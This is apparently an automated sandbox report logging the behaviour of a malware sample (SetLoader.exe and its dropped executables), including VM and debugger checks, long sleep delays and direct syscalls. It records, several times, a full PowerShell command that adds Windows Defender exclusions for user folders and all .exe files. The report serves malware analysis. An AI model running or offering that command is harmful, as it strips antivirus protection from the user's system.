              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\System32\dwm.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4432Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5455Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5764
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4067
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeDropped PE file which has not been started: C:\Windows\Temp\kzezoxxlsgop.sysJump to dropped file
              Source: C:\Users\user\Desktop\SetLoader.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-25097
              Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe TID: 5024Thread sleep time: -90000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep count: 4432 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep count: 5455 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 5764 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 4067 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
              Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0061C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0061C4A8
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062E560 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0062E560
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00630B80 VirtualQuery,GetSystemInfo,0_2_00630B80
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: w1.exe, 00000004.00000003.2223062248.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2251052982.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2268729226.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2277021614.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2306124438.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI=
              Source: w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: w1.exe, 00000004.00000002.2306124438.0000000000E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\SetLoader.exeAPI call chain: ExitProcess graph end nodegraph_0-26408
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0063647F
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063A640 mov eax, dword ptr fs:[00000030h]0_2_0063A640
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063E680 GetProcessHeap,0_2_0063E680
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063215D SetUnhandledExceptionFilter,0_2_0063215D
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006312D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006312D7
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0063647F
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00631FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00631FCA
              Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,67_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtClose: Direct from: 0x1402F4C1E
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x140AD36C1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Direct from: 0x140247785
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x1408A9EA8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtProtectVirtualMemory: Direct from: 0x140B07BC5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Direct from: 0x140297727
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtProtectVirtualMemory: Direct from: 0x1409189E7Jump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtUnmapViewOfSection: Direct from: 0x140ED698F
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x1408B62E8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Direct from: 0x1402FDD45
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Indirect: 0x14088F35F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Direct from: 0x14024B364
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtProtectVirtualMemory: Direct from: 0x1408FA0E3Jump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x1408F5582
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x140AE2BF3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Direct from: 0x1402CD6A3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x14089D8A0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Direct from: 0x14023CFC7
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtProtectVirtualMemory: Direct from: 0x140909645Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtUnmapViewOfSection: Direct from: 0x1409469E6Jump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x140AE9C00
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtMapViewOfSection: Direct from: 0x14027C44D
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtOpenFile: Direct from: 0x14026F9ED
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x140ED6451
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeNtProtectVirtualMemory: Indirect: 0x1401EAEB5
